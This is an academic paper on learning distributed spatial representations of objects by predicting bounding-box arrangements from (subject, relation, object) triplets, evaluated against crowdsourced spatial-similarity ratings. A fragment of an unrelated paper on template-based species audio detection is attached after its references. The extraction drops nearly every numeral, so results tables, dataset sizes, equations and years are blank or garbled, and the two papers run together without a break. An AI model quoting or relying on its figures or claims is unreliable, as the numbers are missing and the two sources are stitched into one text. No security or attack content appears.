actions from the relative locations of the objects seems infeasible. addition- ally, regier’s ( ) architecture does not allow to meaningfully extract representations of objects from the visual input—which yields rather visual features. here, we propose an ad hoc setting for both, learning and evaluating spatial representations. in particular, instead of learning to predict spatial rela- tions from visual input as in regier’s ( ) work, we learn the reverse direction, i.e., to map the rela- tion (and two objects) to their visual spatial arrange- ment. by backpropagating the embeddings of the objects while learning the task, we enable learning spatial representations. as a core finding, we show in an ad hoc task, namely our collected human rat- ings of spatial similarity, that the learned features are more specialized in spatial knowledge than the cnn features and word embeddings that were used to initialize the parameters of the embeddings. tasks and model here, we first describe the prediction task and model that we use to learn the spatial representations. we subsequently present the spatial similarity task which is employed to evaluate the quality of the learned representations. . prediction task to evaluate the ability of a model or embeddings to learn spatial knowledge, we employ the task of pre- dicting the spatial location of an object (“o”) rela- tive to a subject (“s”) under a relationship (“r”). let oc = (ocx,o c y) denote the coordinates of the center (“c”) of the object’s bounding box, where ocx ∈ r and ocy ∈ r are its x and y compo- nents. let ob = (obx,o b y) be one half of the ver- tical (oby ∈ r) and horizontal (obx ∈ r) sizes of the object’s bounding box (“b”). a similar notation ap- plies to the subject (i.e., sc and sb), and we denote model predictions with a hat ôc, ôb. the task is to learn a mapping from the structured textual input (subject, relation, object)—abbreviated by (s, r, o)—to the output consisting of the object’s center coordinates oc and its size ob (see fig. ). we notice that a “subject” is not necessarily a syntactic subject but simply a convenient notation to accommodate the case where the relationship (r) is an action (e.g., “riding” or “wearing”), while when r is a spatial preposition (e.g., “below” or “on”) the subject simply denotes the referent object. simi- larly, the object is not necessarily a direct object. . regression model following the task above (sect. . ), we con- sider a model (fig. ) that takes a triplet of words (s, r, o) as input and maps their one- we prefer to adhere to the terminology used to express entity-relationships in the visual genome dataset, but are aware of annotation schemes for spatial semantics (pustejovsky et al., ). however, a one-to-one mapping of the visual genome terminology to these annotation schemes is not always possible. re-scale coordinates mirror image (if needed) image pre-processing obj. subj. man walking dog o b j. r e l. s u b j. output: coordinates & size learning (regression) [s c x , s c y ] [s b x , s b y ] original image (with bounding boxes) embedding layer (vis. or lang.) composition layers input (structured text) concatenate sby sbx [scx , scy] subj. obj. [ocx , ocy] obj.o b y obx = [ocx , ocy , obx , oby] figure : overview of the model (right) and the image pre-processing setting (left). hot vectors ws, wr, wo to d-dimensional dense vectors wsws,wrwr,wowo via dot product with their respective embedding matrices ws ∈ rd×|vs|,wr ∈ rd×|vr|,wo ∈ rd×|vo|, where |vs|, |vr|, |vo| are the vocabulary sizes. the em- bedding layer models our intuition that spatial prop- erties of objects can be, to a certain extent, en- coded with a vector of continuous features. in this work we test two types of embeddings, visual and linguistic. the next layer simply concatenates the three embeddings together with the subject’s size sb and subject center sc. the inclusion of the subject’s size is aimed at providing a reference size to the model in order to predict the size of the object ob. the resulting concatenated vector [wsws,wrwr,wowo,sc,sb] is then fed into a hidden layer(s) which acts as a composition function for the triplet (s, r, o): one-hot vectors (a.k.a. one-of-k), are sparse vectors with everywhere except for a at the position of the k-th word. we find that without inputing sb to the model, it still learns to predict an “average size” for each object due to the mse penalty. however, to keep the design cleaner and intuitive, here we provide the size of the subject to the model. z = f(wh[wsws,wrwr,wowo,s c,sb] + bh) where f(·) is the non-linearity and wh and bh the parameters of the layer. these “composition lay- ers” allow to distinguish between e.g., (man, walks, horse) which is spatially distinct from (man, rides, horse). we find that adding more layers gener- ally improves performance, so the output z above can simply be composed with more layers, i.e., f(wh z + bh ). finally, a linear output layer tries to match the ground truth targets y = (oc,ob) us- ing a mean squared error (mse) loss function: loss(y, ŷ) = ‖ŷ −y‖ where ŷ = (ôc, ôb) is the model prediction and ‖·‖ denotes the euclidean norm. critically, un- like cnns, the model does not make use of the pixels (which are discarded during the image pre- processing (fig. and sect. . . )), but learns ex- clusively from image coordinates, yielding a simpler model focused solely on spatial information. . . image pre-processing we perform the following pre-processing steps to the images before feeding them to the model. (i) normalize the image coordinates by the num- ber of pixels of each axis (vertical and horizontal). this step guarantees that coordinates are indepen- dent of the resolution of the image and always lie within the [ , ]×[ , ] square, i.e., sc,oc ∈ [ , ] . (ii) mirror the image (when necessary). we no- tice that the distinction between right and left is ar- bitrary in images since a mirrored image completely preserves its spatial meaning. for instance, a “man” “feeding” an “elephant” can be arbitrarily at either side of the “elephant”, while a “man” “riding” an “elephant” cannot be either below or above the “ele- phant”. this left/right arbitrariness has also been acknowledged in prior work (singhal et al., ). thus, to enable a more meaningful learning, we mir- ror the image when (and only when) the object is at the left-hand side of the subject. the choice of leaving the object always to the right-hand side is arbitrary and does not entail a loss of general- ity, i.e., we can consider left/right symmetrically re- flected predictions as equiprobable. mirroring pro- vides thus a more realistic performance evaluation in the prediction task and enables learning representa- tions independent of the right/left distinction which is irrelevant for the spatial semantics. . spatial similarity task to evaluate how well our embeddings match human mental representations of spatial knowledge about objects, we collect ratings for , word pairs (w ,w ) asking annotators to rate them by their spa- tial similarity. that is, objects that exhibit similar locations in most situations and are placed similarly relative to other objects would receive a high score, and lower otherwise. for example (cap, sunglasses) would receive a high score as they are usually at the top of the human body, while following a sim- ilar logic, (cap, shoes) would receive a lower score. our collected ratings establish the spatial counter- part to other existing similarity ratings such as se- mantic similarity (silberer and lapata, ), vi- the only conflicting case for the “mirroring” transforma- tion is when the relationship (r) is either “left” or “right,” e.g., (man, left of, car), yet these only account for an insignificant proportion of instances (< . %) and thus we leave them out. sual similarity (silberer and lapata, ) or gen- eral relatedness (agirre et al., ). a few exem- plars of ratings are shown in tab. . following stan- dard practices (pennington et al., ), we compute the prediction of similarity between two embeddings sw and sw (representing words w and w ) with their cosine similarity: cos(sw ,sw ) = sw sw ‖sw ‖‖sw ‖ we notice that this spatial similarity task does not involve learning and its main purpose is to evalu- ate the quality of the representations learned in the prediction task (sect. . ) and the spatial informa- tiveness of visual and linguistic features. word pair rating word pair rating (snowboard, feet) . (horns, backpack) . (ears, eye) . (baby, bag) (cockpit, table) . (hair, laptop) . (cap, hair) (earring, racket) (frisbee, food) . (ears, hat) . table : examples of our collected similarity ratings. experimental setup in this section we describe the experimental settings employed in the tasks and the model. . visual genome data set we obtain our annotated data from visual genome (krishna et al., ). this dataset contains , images and over . m human-annotated object- relationship-object instances (s, r, o) with their corresponding boxes for the object and subject. we keep only those examples for which we have embed- dings available (see sect. . ). this yields ∼ . m instances of the form (s, r, o), , unique im- age objects and , unique relationships (r) for our linguistic embeddings; and ∼ k (s, r, o) instances, , unique image objects and , unique relationships for our visual embeddings. we notice that visual representations do not exist for relationships r (i.e., either prepositions or verbs) and therefore we only require visual embeddings for the pair (s, o) instead of the complete triplet (s, r, o) required in language. notice that since we do not restrict to any particular domain (e.g., furni- ture or landscapes) the combinations (s, r, o) are markedly sparse, which makes learning our predic- tion task especially challenging. . evaluation sets in the prediction task in the prediction task, we consider the following subsets of visual genome (sect. . ) for evaluation purposes: (i) original set: a test split from the original data which contains instances unseen at training time. that is, the test combinations (s, r, o) might have been seen at training time, yet in different in- stances (e.g., in different images). this set contains a large number of noisy combinations such as (peo- ple, walk, funny) or (metal, white, chandelier). (ii) unseen words set: we randomly select a list of objects (e.g., “wheel”, “camera”, “elephant”, etc.) among the most frequent objects in vi- sual genome. we choose them among the most frequent ones in order to avoid meaningless objects such as “gate ”, “number ” or “ : pm” which are not infrequent in visual genome. we then take all instances of combinations that contain any of these words, yielding ∼ k instances. for ex- ample, since “cap” is in our list, (girl, wears, cap) is included in this set. when we enforce “unseen” conditions, we remove all these instances from the training set, using them only for testing. . visual and linguistic features as our linguistic representations, we employ - dimensional glove vectors (pennington et al., ) trained on the common crawl corpus with b- tokens and a . m words vocabulary. we use the publicly available visual representa- tions from collell et al. ( ). they extract - dimensional visual features with the forward pass of a vgg- (visual geometry group) cnn model (chatfield et al., ) pre-trained in imagenet (russakovsky et al., ). the representation of a word is the averaged feature vector (centroid) of the complete list of objects is: [leaves, foot, wheel, t-shirt, ball, handle, skirt, stripe, trunk, face, camera, socks, tail, pants, elephant, ear, helmet, vest, shoe, eye, coat, skateboard, apple, cap, motorcycle]. http://nlp.stanford.edu/projects/glove http://liir.cs.kuleuven.be/software.php all images in imagenet for this concept. they only keep words with at least images available. we notice that although we employ visual features from an external source (imagenet), these could be al- ternatively obtained in the visual genome data— although imagenet generally provides a larger num- ber of images per concept. . method comparison we consider two types of models, those that update the parameters of the embeddings (u ∼ “update”) and those that keep them fixed (nu ∼ “no up- date”) when learning the prediction task. for each type (u and nu) we consider two conditions, em- beddings initialized with pre-trained vectors (ini) and random embeddings (rnd) randomly drawn from a component-wise normal distribution of mean and standard deviation equal to those of the origi- nal embeddings. for example, u-rnd corresponds to a model with updated, random embeddings. for the ini methods we also add a subindex indicating whether the embeddings are visual (vis) or linguistic (lang), as described in sect. . . for the nu type we additionally consider one-hot embeddings ( h). we also include a control method (rand-pred) that outputs random uniform predictions. . implementation details and validation to validate results in our prediction task we employ a -fold cross-validation (cv) scheme. that is, we split the data into parts and employ % of the data for training and % for testing. this yields embeddings (for each “u” method), which are then evaluated in our similarity task. in both tasks, we report results averaged across the folds. model hyperparameters are first selected by cross-validation in initial splits and results are re- ported in new splits. all models employ a learn- ing rate of . and are trained for epochs by backpropagation with the rmsprop optimizer. the dimensionality of the embeddings is the origi- nal one, i.e., d= for glove and d= for vgg- (sect. . ), which is preserved for the random- given that visual representations are not available for the relationships (i.e., verbs and prepositions), the models with vis embeddings employ one-hot embeddings for the relationships and visual embeddings for object and subject. this is a rather neutral choice that enables the vis models to use relationships. embedding methods rnd (sect. . ). models em- ploy hidden layers with rectified linear units (relu), followed by an output layer with a linear ac- tivation. early stopping is employed as a regularizer. we implement our models with keras deep learning framework in python . (chollet and others, ). . spatial similarity task to build the word pairs, we randomly select a list of objects from visual genome and from these we randomly chose , non-repeated word pairs (w ,w ). ratings are collected with the crowd- flower platform and correspond to averages of at least reliable annotators that provided ratings in a discrete scale from to . the median similarity rating is . and the mean variance between annota- tors per word pair is ∼ . . . evaluation metrics . . prediction task we evaluate model predictions with the following metrics. (i) regression metrics. . (i) mean squared error (mse) between the pre- dicted ŷ = (ôc, ôb) and the true y = (oc,ob) ob- ject center coordinates and object size. notice that since oc,ob are within [ , ] , the mse is easily in- terpretable, ranging between and . (ii) pearson correlation (r) between the predicted ôc and the true oc object center coordinates. we consider the vertical (ry) and horizontal (rx) com- ponents separately (i.e., ocx and o c y). (iii) coefficient of determination (r ) of the pre- dictions ŷ = (ôc, ôb) and the target y = (oc,ob). r is employed to evaluate goodness of fit of a re- gression model and is related to the percentage of variance of the target explained by the predictions. the best possible score is and it can be arbitrarily negative for bad predictions. a model that outputs either random or constant predictions would obtain scores close to and exactly respectively. https://www.crowdflower.com/ reliable annotators are those with performance over % in the test questions ( in our case) that the crowdsourcing plat- form allows us to introduce in order to test annotators’ accuracy. (ii) classification. additionally, given the seman- tic distinction between the vertical and horizontal axis noted above (sect. . . ), we consider the clas- sification problem of predicting above/below rela- tive locations. that is, if the predicted y-coordinate for the object center ôcy falls below the y-coordinate of the subject center scy and the actual object cen- ter ocy is below the subject center s c y, we count it as a correct prediction, and as incorrect other- wise. likewise for above predictions. we compute both macro-averaged accuracy (accy) and macro- averaged f (f y) metrics. (iii) intersection over union (iou). we consider the bounding box overlap (iou) from the voc de- tection task (everingham et al., ): iou = area(b̂o ∩ bo)/area(b̂o ∪ bo) where b̂o and bo are predicted and ground truth object boxes re- spectively. a prediction is counted as correct if the iou is larger than %. crucially, we notice that our setting and results are not comparable to object de- tection as we employ text instead of images as input and thus we cannot leverage the pixels to locate the object, unlike in detection. . . similarity task following standard practices (pennington et al., ), the performance of the predictions of (co- sine) similarity from the embeddings (described in sect. . ) is evaluated with the spearman correlation ρ against the crowdsourced human ratings. results and discussion we consider the notation of the methods from sect. . and the evaluation subsets described in sect. . for the prediction task. to test statistical significance we employ a friedman rank test and post hoc nemeny tests on the results of the folds. . prediction task table shows that the ini and rnd methods per- form similarly in the original test set, arguably be- macro-averaged accuracy equals to the average of per-class accuracies, with classes {above, below}. similarly for f . for simplicity, we do not add any subindex (vis or lang) to rnd, yet these vectors are drawn from two different distri- butions, i.e., from either vis or lang embeddings (sect. . ). additionally, results tables show two blocks of methods since vis and lang do not share all the instances (see sect. . ). cause a large part of the learning takes place in the parameters of the layers subsequent to the embed- ding layer. however, in the next section we show that this is no longer the case when unseen words are present. we also observe that the one-hot embed- dings nu- h perform slightly better than the rest of methods when no unseen words are present (tab. and tab. right). mse r accy f y rx ry iou u-inilang . . . . . . . u-rndlang . . . . . . . nu-inilang . . . . . . . nu-rndlang . . . . . . . nu- h . . . . . . . rand-pred . - . . . . . . u-inivis . . . . . . . u-rndvis . . . . . . . nu-inivis . . . . . . . nu-rndvis . . . . . . . nu- h . . . . . . . rand-pred . - . . . . . . table : results in the original test set (sect. . ). bold- face indicates best performance within the corresponding block of methods (lang above, and vis below). it is also worth noting that the results of the pre- diction task are, in fact, conservative. first, the original test data contains a considerable number of meaningless (e.g., (giraffe, a, animal)), and ir- relevant combinations (e.g., (clock, has, numbers) or (sticker, identifies, apple)). second, even when only meaningful examples are considered, we are in- evitably penalizing for plausible predictions. for in- stance, in (man, watching, man) we expect both men to be reasonably separated on the x-axis yet the one with the highest y coordinate is generally not pre- dictable as it depends on their height and their dis- tance to the camera. this yields above/below classi- fication performance and correlations. regardless, all methods (except rand-pred) exhibit reasonably high performance in all measures. . . evaluation on unseen words table evidences that both visual and linguistic embeddings (inivis and inilang) significantly out- perform their random-embedding counterparts rnd by a large margin when unseen words are present. the improvement occurs for both, updated (u) and non-updated (nu) embeddings—although it is ex- pected that the updated methods perform slightly worse than the non-updated ones since the original embeddings will have “moved” during training and therefore an unseen embedding (which has not been updated) might no longer be close to other semanti- cally similar vectors in the updated space. besides statistical significance, it is worth men- tioning that the ini methods consistently outper- formed both their rnd counterparts and nu- h in each of the folds (not shown here) by a steadily large margin. in fact, results are markedly stable across folds, in part due to the large size of the train- ing and test sets (> . m and > k examples re- spectively). additionally, to ensure that “unseen” results are not dependent on our particular list of objects, we repeated the experiment with two addi- tional lists of randomly selected objects, obtaining very similar results. remarkably, the ini methods experience only a small performance drop under unseen conditions (tab. , left) compared to when we allow them to train with these words (tab. , right), and this differ- ence might be partially attributed to the reduction of the training data under “unseen” conditions, where at least % of the training data are left out. altogether, these results on unseen words show that semantic and visual similarities between con- cepts, as encoded by word and visual embeddings, can be leveraged by the model in order to predict spatial knowledge about unseen words. . . qualitative insight visual inspection of model predictions is instruc- tive in order to gain insight on the spatial informa- tiveness of visual and linguistic representations on unseen words. figure shows heat maps of low (black) and high (white) probability regions for the objects. the “heat” for the object is assumed to be normally distributed with mean (µ) equal to the pre- dicted object center ôc and standard deviation (σ) equal to the predicted object size ôb (assuming in- dependence of the x and y components, which yields the product of two gaussians, one for each compo- nent x and y). the “heat” for the subject is com- puted similarly, although with µ and σ equal to the in this prediction task we have additionally considered the concatenation of visual and linguistic representations (not shown), which did not show any relevant improvement over the unimodal representations. unseen words condition seen words condition mse r accy f y rx ry iou mse r accy f y rx ry iou u-inilang . ∗� . ∗� . ∗� . ∗� . ∗� . ∗ . ∗� . . ∗ . . . . . u-rndlang . . . . . . . . . . . . . . nu-inilang . ∗� . ∗� . ∗� . ∗� . ∗� . ∗� . ∗� . . ∗ . . . . . nu-rndlang . . . . . . . . . . . . . . nu- h . . . . . . . . . . . . . . rand-pred . - . . . . . . . - . . . - . - . . u-inivis . ∗� . ∗� . ∗� . ∗� . ∗� . ∗� . ∗� . . . . . . . u-rndvis . . . . . . . . . . . . . . nu-inivis . ∗� . ∗� . ∗� . ∗� . ∗� . ∗� . ∗� . . . . . . . nu-rndvis . . . . . . . . . . . . . . nu- h . . . . . . . . . . . . . . rand-pred . - . . . - . . . . - . . . - . - . . table : results in the unseen words set (sect. . ). left table: results of enforcing “unseen” conditions, i.e., leaving out all words of the unseen words set from our training data. right table: the models are evaluated in the same set but we allow them to train with the words from this set. asterisks (∗) in an ini method indicate significantly better performance (p < . ) than its rnd counterpart (i.e., u-iniemb type is compared against u-rnd, and nu- iniemb type against nu-rnd). diamonds (�) indicate significantly better performance than nu- h. actual subject center sc and size sb, respectively. the ini methods in figure illustrate the contri- bution of the embeddings to the spatial understand- ing of unseen objects. in general, both visual and linguistic embeddings enabled predicting meaning- ful spatial arrangements, yet for the sake of space we have only included three examples where: vis performs better than lang (third column), where lang performs better than vis (second column), and where both perform well (first column). we notice that the embeddings enable the model to infer that e.g., since “camera” (unseen) is similar to “cam- corder” (seen at training time), both must behave spatially similarly. likewise, the embeddings enable predicting correctly the relative sizes of unseen ob- jects. we also observe that when the embeddings are not informative enough, model predictions be- come less accurate. for instance, in nu-inilang, some unrelated objects (e.g., “ipod”) have embed- dings similar to “apple”, and analogously for nu- inivis and “tail”. we finally notice that predictions on unseen objects using random embeddings (rnd) are markedly bad. . spatial similarity task table shows the results of evaluating the em- beddings, including those learned in the predic- tion task, against the human ratings of spatial sim- ilarity (sect. . ). hence, only the “updated” methods (u) are shown and we additionally in- clude the concatenation of visual and linguistic embeddings concglove+vgg- and the concate- nation of the corresponding updated embeddings concu-inilang+u-inivis . lang v&l glove . . vgg- - . concglove+vgg- - . u-inilang . ± . ∗ . ± . ∗ u-inivis - . ± . ∗ concu-inilang+u-inivis - . ± . ∗ u-rnd . ± . . ± . # word pairs table : spearman correlations between model predic- tions and human ratings. standard errors across folds are shown for the methods that involve learning (second block). columns correspond to the word pairs for which both embeddings (vis and lang) are available (v&l) and those for which only the linguistic embeddings are available (lang). asterisk (∗) indicates significant im- provement (p < . ) of a u-ini method of the second block (u-inivis and u-inilang) over its corresponding untrained embedding (i.e., vgg- or glove respec- tively) from the first block. the first thing to notice in tab. is that both visual and linguistic embeddings show good corre- lations with human spatial ratings (ρ > . and ρ > . respectively), suggesting that visual and linguistic features carry significant knowledge about n u -i n i la n g camcorder tripod viewfinder screen . . . . wings hind feather beak . . . . ipod lemon cranberry cinnamon . . . . person, holding, applezebra, has, tailman, holding, camera n u -i n i vi s viewfinder shutter lens camcorder . . . . bird feeder woodpecker pigeon . . . . pear fruit tomato melon . . . . n u -r n d obstacle region bone interstate . . . . brandings tree peppercorns ladies . . . . diploma manicure sweatpants garage . . . . figure : heat maps of predictions of the nu-inilang, u-inivis and nu-rnd methods. the unseen objects are underlined (top of the image) and their corresponding four (cosine-based) nearest neighbors are shown below with their respective cosine similarities. spatial properties of objects. in particular, linguistic features seem to be more spatially informative than visual features. crucially, we observe a significant improvement of the u-inivis over the original visual vectors (vgg- ) (p < . ) and of the u-inilang over the original linguistic embeddings (glove) (p < . ), which evidence the effectiveness of training in the prediction task as a method to further specialize em- beddings in spatial knowledge. it is worth mention- ing that these improvements are consistent in each of the folds (not shown here) and markedly sta- ble (see standard errors in tab. ). we additionally observe that the concate- nation of visual and linguistic embeddings concglove+vgg- outperforms all unimodal embeddings by a margin, suggesting that the fusion of visual and linguistic features provides a more complete description of spatial properties of objects. remarkably, the improvement is even larger for the concatenation of the embeddings updated during training concu-inilang+u-inivis , which obtains the highest performance overall. figure illustrates the progressive specialization of our embeddings in spatial knowledge as we train them in our prediction task. we notice that all em- beddings improve, yet u-inilang seem to worsen their quality when we over-train them—likely due to overfitting, as we do not use any regularizer besides early stopping. we also observe that although the random embeddings (rnd) are the ones that benefit the most from the training, their performance is still far from that of u-inivis and u-inilang, suggesting the importance of visual and linguistic features to represent spatial properties of objects. . . . . . . sp ea rm an c o rr e la ti o n number of epochs u-inilang u-inivis u-rnd glove vgg- figure : correlation between human ratings and embed- ding cosine similarities at each number of epochs. it is relevant to mention that in a pilot study we crowdsourced a different list of , object pairs where we employed instead of annotators per row. results stayed remarkably consistent with those presented here—the improvement for the up- dated embeddings was in fact even larger. limitations of the current approach and future work in order to keep the design clean in this first paper on distributed spatial representations we em- ploy a fully supervised setup. however, we notice that methods to automatically parse images (e.g., ob- ject detectors) and sentences are available. a second limitation is the d simplification of the actual d world that our approach and the current spatial literature generally employs. even though methods that infer d structure from d images ex- ist, this is beyond the scope of this paper which shows that a d treatment already enhances the learned spatial representations. it is also worth not- ing that the proposed regression setting trivially gen- eralizes to d if suitable data are available, and in fact, we believe that the learned representations could further benefit from such extension. conclusions altogether, this paper sheds light on the problem of learning distributed spatial representations of ob- jects. to learn spatial representations we have lever- aged the task of predicting the continuous d rel- ative spatial arrangement of two objects under a relationship, and a simple embedding-based neural model that learns this task from annotated images. in the same prediction task we have shown that both word embeddings and cnn features endow the model with great predictive power when is presented with unseen objects. next, in order to assess the spa- tial content of distributed representations, we have collected a set of , object pairs rated by spatial similarity. we have shown that both word embed- dings and cnn features are good predictors of hu- man spatial judgments. more specifically, we find that word embeddings (ρ = . ) tend to perform better than visual features (ρ ∼ . ), and that their combination (ρ ∼ . ) outperforms both modalities separately. crucially, in the same ratings we have shown that by training the embeddings in the pre- diction task we can further specialize them in spatial knowledge, making them more akin to human spa- tial judgments. to benchmark the task, we make the similarity dataset and our trained spatial representa- tions publicly available. lastly, this paper contributes to the automatic un- https://github.com/gcollell/spatial-representations derstanding of spatial expressions in language. the lack of common sense knowledge has been recur- rently argued as one of the main reasons why ma- chines fail at exhibiting more “human-like” behav- ior in tasks (lin and parikh, ). here, we have provided a means of compressing and encod- ing such common sense spatial knowledge about ob- jects into distributed representations, further show- ing that these specialized representations correlate well with human judgments. in future work, we will also explore the application of our trained spatial embeddings in extrinsic tasks in which representing spatial knowledge is essential such as robot naviga- tion or robot understanding of natural language com- mands (guadarrama et al., ; moratz and ten- brink, ). robot navigation tasks such as assist- ing people with special needs (blind, elderly, etc.) are in fact becoming increasingly necessary (ye et al., ) and require great understanding of spatial language and spatial connotations of objects. acknowledgments this work has been supported by the chist-era eu project muster and by the ku leuven grant run/ / . we additionally thank our anony- mous reviewers for their insightful comments which helped to improve the overall quality of the paper, and the action editors for their helpful assistance. references eneko agirre, enrique alfonseca, keith hall, jana kravalova, marius paşca, and aitor soroa. . a study on similarity and relatedness using distribu- tional and wordnet-based approaches. in naacl, pages – . acl. mohit bansal, kevin gimpel, and karen livescu. . tailoring continuous word representations for de- pendency parsing. in acl, pages – . ken chatfield, karen simonyan, andrea vedaldi, and andrew zisserman. . return of the devil in the details: delving deep into convolutional nets. in bmvc. françois chollet et al. . keras. https:// github.com/fchollet/keras. guillem collell and marie-francine moens. . is an image worth more than a thousand words? on the fine-grain semantic differences between visual and http://www.chistera.eu/projects/muster linguistic representations. in coling, pages – . acl. guillem collell, teddy zhang, and marie-francine moens. . imagined visual representations as multimodal embeddings. in aaai, pages – . aaai. guillem collell, luc van gool, and marie-francine moens. . acquiring common sense spatial knowledge through implicit spatial templates. in aaai. aaai. desmond elliott and frank keller. . image de- scription using visual dependency representations. in emnlp, volume , pages – . mark everingham, s.m. ali eslami, luc van gool, christopher k.i. williams, john winn, and andrew zisserman. . the pascal visual object classes challenge: a retrospective. international journal of computer vision, ( ): – . jerome feldman, george lakoff, david bailey, srini narayanan, terry regier, and andreas stolcke. . l -the first five years of an automated language acquisition project. integration of natural language and vision processing, : . kenneth d. forbus, paul nielsen, and boi faltings. . qualitative spatial reasoning: the clock project. artificial intelligence, ( - ): – . sergio guadarrama, lorenzo riano, dave golland, daniel go, yangqing jia, dan klein, pieter abbeel, trevor darrell, et al. . grounding spatial re- lations for human-robot interaction. in iros, pages – . ieee. douwe kiela, felix hill, and stephen clark. . spe- cializing word embeddings for similarity or related- ness. in emnlp, pages – . ranjay krishna, yuke zhu, oliver groth, justin johnson, kenji hata, joshua kravitz, stephanie chen, yannis kalantidis, li-jia li, david a. shamma, et al. . visual genome: connecting language and vision us- ing crowdsourced dense image annotations. interna- tional journal of computer vision, ( ): – . geert-jan m. kruijff, hendrik zender, patric jensfelt, and henrik i. christensen. . situated dialogue and spatial organization: what, where and why? international journal of advanced robotic systems, ( ): . xiao lin and devi parikh. . don’t just listen, use your imagination: leveraging visual common sense for non-visual tasks. in cvpr, pages – . mateusz malinowski and mario fritz. . a pooling approach to modelling spatial relations for image retrieval and annotation. arxiv preprint arxiv: . v . reinhard moratz and thora tenbrink. . spatial ref- erence in linguistic human-robot interaction: itera- tive, empirically supported development of a model of projective relations. spatial cognition and com- putation, ( ): – . jeffrey pennington, richard socher, and christopher d. manning. . glove: global vectors for word representation. in emnlp, volume , pages – . james pustejovsky, jessica moszkowicz, and marc ver- hagen. . a linguistically grounded annota- tion language for spatial information. traitement au- tomatique des langues, ( ): – . terry regier. . the human semantic potential: spatial language and constrained connectionism. mit press. olga russakovsky, jia deng, hao su, jonathan krause, sanjeev satheesh, sean ma, zhiheng huang, andrej karpathy, aditya khosla, michael bernstein, et al. . imagenet large scale visual recognition chal- lenge. international journal of computer vision, ( ): – . sz-rung shiang, stephanie rosenthal, anatole gersh- man, jaime carbonell, and jean oh. . vision- language fusion for object recognition. in aaai, pages – . aaai. carina silberer and mirella lapata. . learn- ing grounded meaning representations with autoen- coders. in acl, pages – . amit singhal, jiebo luo, and weiyu zhu. . proba- bilistic spatial context models for scene content un- derstanding. in cvpr, volume , pages – . ieee. duyu tang, furu wei, nan yang, ming zhou, ting liu, and bing qin. . learning sentiment-specific word embedding for twitter sentiment classification. in acl, pages – . cang ye, soonhac hong, and amirhossein tamjidi. . -dof pose estimation of a robotic naviga- tion aid by tracking visual and geometric features. ieee transactions on automation science and engi- neering, ( ): – . submitted december accepted april published april corresponding author carlos j. corrada bravo, carlos.corrada @upr.edu academic editor elena marchiori additional information and declarations can be found on page doi . /peerj-cs. copyright corrada bravo et al. distributed under creative commons cc-by . open access species-specific audio detection: a comparison of three template-based detection algorithms using random forests carlos j. corrada bravo , , rafael Álvarez berríos and t. mitchell aide , department of computer science, university of puerto rico—rio piedras, san juan, puerto rico sieve analytics, inc., san juan, puerto rico department of biology, university of puerto rico—río piedras, san juan, puerto rico abstract we developed a web-based cloud-hosted system that allow users to archive, listen, visualize, and annotate recordings. the system also provides tools to convert these annotations into datasets that can be used to train a computer to detect the presence or absence of a species. the algorithm used by the system was selected after comparing the accuracy and efficiency of three variants of a template-based detection. the algorithm computes a similarity vector by comparing a template of a species call with time increments across the spectrogram. statistical features are extracted from this vector and used as input for a random forest classifier that predicts presence or absence of the species in the recording. the fastest algorithm variant had the highest average accuracy and specificity; therefore, it was implemented in the arbimon web-based system. subjects bioinformatics, computational biology, data mining and machine learning keywords acoustic monitoring, machine learning, animal vocalizations, recording visualization, recording annotation, generic species algorithm, web-based cloud-hosted system, random forest classifier, species prediction, species-specific audio detection introduction monitoring fauna is an important task for ecologists, natural resource managers, and conservationists. historically, most data were collected manually by scientists that went to the field and annotated their observations (terborgh et al., ). this generally limited the spatial and temporal extend of the data. furthermore, given that the data were based on an individual’s observations, the information was difficult to verify, reducing its utility for understanding long-term ecological processes (acevedo & villanueva-rivera, ). to understand the impacts of climate change and deforestation on the fauna, the scientific community needs long-term, wide-spread and frequent data (walther et al., ). passive acoustic monitoring (pam) can contribute to this need because it facilitates the collection of large amounts of data from many sites simultaneously, and with virtually no impact to the fauna and environment (brandes, ; lammers et al., ; tricas & boyle, ; celis-murillo, deppe & ward, ). in general, pam systems include a microphone or a hydrophone connected to a self powered system and enough memory to store various weeks or months of recordings, but there are also permanent systems that how to cite this article corrada bravo et al. ( ), species-specific audio detection: a comparison of three template-based detection al- gorithms using random forests. peerj comput. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:carlos.corrada @upr.edu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://dx.doi.org/ . /peerj-cs. use solar panels and an internet connection to upload recordings in real time to a cloud based analytical platform (aide et al., ). passive recorders can easily create a very large data set (e.g., , s of recordings) that is overwhelming to manage and analyze. although researchers often collect recordings twenty-four hours a day for weeks or months (acevedo & villanueva-rivera, ; brandes, ; lammers et al., ; sueur et al., ; marques et al., ; blumstein et al., ), in practice, most studies have only analyzed a small percentage of the total number of recordings. web-based applications have been developed to facilitate data management of these increasingly large datasets (aide et al., ; villanueva-rivera & pijanowski, ), but the biggest challenge is to develop efficient and accurate algorithms for detecting the presence or absence of a species in many recordings. algorithms for species identification have been developed using spectrogram matched filtering (clark, marler & beeman, ; chabot, ), statistical feature extraction (taylor, ; grigg et al., ), k-nearest neighbor algorithm (han, muniandy & dayou, ; gunasekaran & revathy, ), support vector machine (fagerlund, ; acevedo et al., ), tree- based classifiers (adams, law & gibson, ; henderson, hildebrand & smith ) and template based detection (anderson, dave & margoliash, ; mellinger & clark, ), but most of these algorithms are built for a specific species and there was no infrastructure provided for the user to create models for other species. in this study, we developed a method that detects the presence or absence of a species’ specific call type in recordings with a response time that allows researchers to create, run, tune and re-run models in real time as well as detect hundreds of thousands of recordings in a reasonable time. the main objective of the study was to compare the performance (e.g., efficiency and accuracy) of three variants of a template-based detection algorithm and incorporate the best into the arbimon ii bioacoustics platform. the first variant is the structural similarity index described in wang et al. ( ), a widely use method to find how similar two images are (in our case the template with the tested recording). the second method filters the recordings with the dynamic thresholding method described in van der walt et al. ( ) and then use the frobenius norm to find similarities with the template. the final method uses the structural similarity index, but it is only applied to regions with high match probability determined by the opencv’s matchtemplate procedure (bradski, ). materials and methods passive acoustic data acquisition we gathered recordings from five locations: four in puerto rico and one in peru. some of the recordings were acquired using the automated remote biodiversity monitoring network (arbimon) data acquisition system described in aide et al. ( ), while others were acquired using the newest version of arbimon permanent recording station, which uses an android cell phone and transmits the recorded data through a cellular network. all recordings have a sampling rate of . khz, a sampling depth of -bit and an approximate duration of s (±. s) corrada bravo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure recording locations in puerto rico. map data: google, image—landsat/copernicus and data—sio, 